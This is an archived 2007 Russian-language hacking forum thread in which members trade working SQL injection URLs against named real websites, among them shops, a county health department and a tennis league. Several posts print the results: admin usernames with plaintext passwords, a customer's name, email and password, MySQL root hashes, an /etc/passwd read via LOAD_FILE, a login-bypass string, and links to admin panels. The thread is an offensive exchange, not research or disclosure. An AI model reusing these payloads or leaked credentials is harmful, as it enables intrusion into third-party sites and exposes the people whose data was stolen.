ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

sql
  #1  
Старый 01.07.2007, 20:01
Аватар для Серенький
Серенький
Banned
Регистрация: 13.04.2007
Сообщений: 123
Провел на форуме:
921520

Репутация: 572
Lightbulb sql

2злюка
Цитата:
Код:
http://www.sportsguns.co.uk/addpage.php?page_id=-1+union+select+1,2,3,4,5/

эх найти бы таблицу юзеров
tbl_user
Цитата:
http://www.sportsguns.co.uk/addpage.php?page_id=-1+union+select+1,2,count(1),4,5+from+tbl_user/*
95167 записей
Цитата:
http://www.sportsguns.co.uk/addpage.php?page_id=-1+union+select+1,2,concat_ws(0x3a,username,passwor d),4,5+from+tbl_user+limit+0,1/*
admin:highstreet4013

админка
Цитата:
http://www.sportsguns.co.uk/login.php
-----------------------------------------------------------------

NOmeR1
Цитата:
http://www.arcteryx.nu/butiken/product.php?uid=-720+union+select+1,concat_ws(0x3a,USER(),DATABASE( ),VERSION()),3,4,5,6,7,8,9,10,11,12,13,14/*
Хм.. Наверно там больше нет =\ Даже файлы прочитать не смог..
вот-с
Цитата:
http://www.arcteryx.nu/butiken/product.php?uid=-720+union+select+1,concat_ws(0x3a,name,email,passw d),3,4,5,6,7,8,9,10,11,12,13,14+from+users+limit+0 ,1/*
ROBERT JONASSON:BMF_RIPPER@HOTMAIL.COM:4TWCPP
можно залогиниться тут - http://www.arcteryx.nu/butiken/login.php - но хз что с этим делать, я по голандски не умею, надо Хиддинка спросить)

------------------------------------------------------------------------

iv.
Цитата:
Подбираем кол-во колонок: Цитата:http://nvmu.ru/cgi-bin/index.cgi?page=-1%20union%20select%201,2,3,4,5/* Version: MySQL 5.1.19-beta User: nvmu@localhost Database: nvmu Вывод только в заголовке, прав на mysql.user не хватает, возможно как-нибудь нормально инъектироваться?
можно нормально вывести здесь
Цитата:
http://nvmu.ru/cgi-bin/news.cgi?id=-bzU1UjCC'+union+select+1,2,table_name+from+informa tion_schema.tables+limit+35,1/*
есть табличка members
Цитата:
http://nvmu.ru/cgi-bin/news.cgi?id=-bzU1UjCC'+union+select+1,2,concat_ws(0x3a,login,pa ssword,email)+from+members+limit+0,1/*
Borisov:3788:s_nahim@inbox.ru
еще примечательно, что можно авторизироваться просто введя ' or 1=1/* вместо логина плюс произвольный пароль

-----------------------------------------------------------------------
[PS] что-то везде пароли хранятся в открытом виде

Последний раз редактировалось Серенький; 01.07.2007 в 20:49..
 
Ответить с цитированием

  #2  
Старый 02.07.2007, 15:07
Аватар для Spyder
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

Цитата:
http://www.qb4q.com/vacation.php?wid=-14+union+select+1,version(),3,4,5,6,7,8,9,0,11,12, 13,14
=\
 
Ответить с цитированием

  #3  
Старый 02.07.2007, 15:19
Аватар для Ky3bMu4
Ky3bMu4
Постоянный
Регистрация: 03.02.2007
Сообщений: 520
Провел на форуме:
1777536

Репутация: 932


Отправить сообщение для Ky3bMu4 с помощью ICQ
По умолчанию

http://www.worldteamtennis.com/
Офф сайт WTT(только чёт PR 4)

Код:
http://www.worldteamtennis.com/news/news_info.asp?news_id=-251+union+select+1,2,3,password,username,6,7,8,9+from+users
Одновременно username и password выводить не хочет. Надо по отдельности.

User: admin
Password: 2$$7#newsx
Админку не нашёл...


Вот ещё сайтец с доступом в user , то только выводить ничё не хочет...

Код:
http://www.yourmajesty.net/News_selec.asp?News_ID=-116+union+select+1,2,3,4,5,6,7,8+from+user
 
Ответить с цитированием

  #4  
Старый 02.07.2007, 16:09
Аватар для [53x]Shadow
[53x]Shadow
Leaders of Antichat
Регистрация: 25.01.2007
Сообщений: 341
Провел на форуме:
3372120

Репутация: 2565
По умолчанию

Цитата:
Сообщение от Ky3bMu4  

Вот ещё сайтец с доступом в user , то только выводить ничё не хочет...

Код:
http://www.yourmajesty.net/News_selec.asp?News_ID=-116+union+select+1,2,3,4,5,6,7,8+from+user
Это MSSQL. Это не правильный вывод и там нет User.
 
Ответить с цитированием

  #5  
Старый 02.07.2007, 17:50
Аватар для V1p-eR
V1p-eR
Познающий
Регистрация: 02.07.2007
Сообщений: 34
Провел на форуме:
446543

Репутация: 29
По умолчанию

вношу свои =)
Код:
http://www.ji-association.org/news.phtml?id=-1+union+select+VERSION(),2,3,4,5,USER(),7,8,9,10+from+users/*
Код:
http://www.cosmopolitan.kz/content.php?idpart=3&idnum=-1+union+select+1,2,3,VERSION(),USER(),6,7,8/*
Код:
http://slt-tosol.ru/catalog.php?id=-1+union+select+1,VERSION(),USER(),4,5,6,7,8/*
 
Ответить с цитированием

  #6  
Старый 02.07.2007, 15:49
Аватар для Серенький
Серенький
Banned
Регистрация: 13.04.2007
Сообщений: 123
Провел на форуме:
921520

Репутация: 572
Arrow

Цитата:
Spyder
Цитата:http://www.qb4q.com/vacation.php?wid=-14+union+select+1,version(),3,4,5,6,7,8,9,0,11,12, 13,14

=\
никак не смог подобрать колонку с пассом..\
а табличка мемберс:

Цитата:
http://www.qb4q.com/vacation.php?wid=-14+union+select+1,2,3,4,5,6,7,8,9,0,11,concat_ws(0 x3a,name,email),13,14+from+members/*

Последний раз редактировалось Серенький; 02.07.2007 в 16:01..
 
Ответить с цитированием

  #7  
Старый 02.07.2007, 19:34
Аватар для Extremal
Extremal
Познающий
Регистрация: 21.06.2006
Сообщений: 74
Провел на форуме:
2441743

Репутация: 222
Отправить сообщение для Extremal с помощью ICQ
По умолчанию

Ещё 1
Код:
http://www.clarkhealthdept.org/news.phtml?id=-1+union+select+1,2,password,user,5+from+mysql.user/*
как мне и посоветовал iv буду развивть скули
Код:
http://www.clarkhealthdept.org/news.phtml?id=-1+union+select+1,2,LOAD_FILE('/etc/passwd'),user,5+from+mysql.user/*
1ая мой sql которую более мение получилось создать

Последний раз редактировалось Extremal; 02.07.2007 в 20:48..
 
Ответить с цитированием

  #8  
Старый 02.07.2007, 20:01
Аватар для kair
kair
Участник форума
Регистрация: 12.10.2006
Сообщений: 158
Провел на форуме:
668286

Репутация: 187
Отправить сообщение для kair с помощью ICQ
По умолчанию

Цитата:
Сообщение от Extremal  
Ещё 1
Код:
http://www.clarkhealthdept.org/news.phtml?id=-1+union+select+1,2,VERSION(),user,5+from+mysql.user/*
1ая мой sql которую более мение получилось создать
Код:
http://www.clarkhealthdept.org/news.phtml?id=-1+union+select+1,2,VERSION(),concat(password,char(58),user),5+from+mysql%20.user/*

Последний раз редактировалось kair; 02.07.2007 в 20:03..
 
Ответить с цитированием

  #9  
Старый 02.07.2007, 20:17
Аватар для Extremal
Extremal
Познающий
Регистрация: 21.06.2006
Сообщений: 74
Провел на форуме:
2441743

Репутация: 222
Отправить сообщение для Extremal с помощью ICQ
Talking

Ещё 2 нашел
Код:
http://megaload.megalan.tv/catalog.php?id=-1+union+select+1,2,3,4,5,6,USER(),version()/*
Код:
http://ethology.ru/humor/?id=-1+union+select+1,2,3,user(),DATABASE()/*
Из за своего малого опыта в скуль инъекциях ни че подобрать не удалось...может у вас чё нить получиться

Последний раз редактировалось Extremal; 02.07.2007 в 20:44..
 
Ответить с цитированием

  #10  
Старый 03.07.2007, 00:01
Аватар для [53x]Shadow
[53x]Shadow
Leaders of Antichat
Регистрация: 25.01.2007
Сообщений: 341
Провел на форуме:
3372120

Репутация: 2565
По умолчанию

Цитата:
Сообщение от kair  
Код:
http://www.clarkhealthdept.org/news.phtml?id=-1+union+select+1,2,VERSION(),concat(password,char(58),user),5+from+mysql%20.user/*
root:0a53c31a74397e18
Так лучше:
username = "root";
password = "jd4495jv";
таблица:
Код:
http://www.clarkhealthdept.org/news.phtml?id=-1+union+select+1,2,3,concat(username,0x3a,password),5+from+meg.admin/*
админка закрыта на уровне htaccess
http://www.clarkhealthdept.org/admin
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ